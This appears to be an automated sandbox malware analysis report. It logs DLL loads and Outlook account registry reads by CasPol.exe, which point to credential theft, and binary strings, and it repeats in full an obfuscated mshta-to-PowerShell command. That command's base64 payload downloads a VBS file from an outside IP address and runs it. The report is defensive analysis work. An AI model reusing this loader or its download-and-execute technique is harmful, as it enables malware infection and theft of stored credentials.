                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1797357428.0000000006F65000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2061958938.0000000006A60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.pdb source: powershell.exe, 00000003.00000002.1793452153.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2061958938.0000000006A60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIl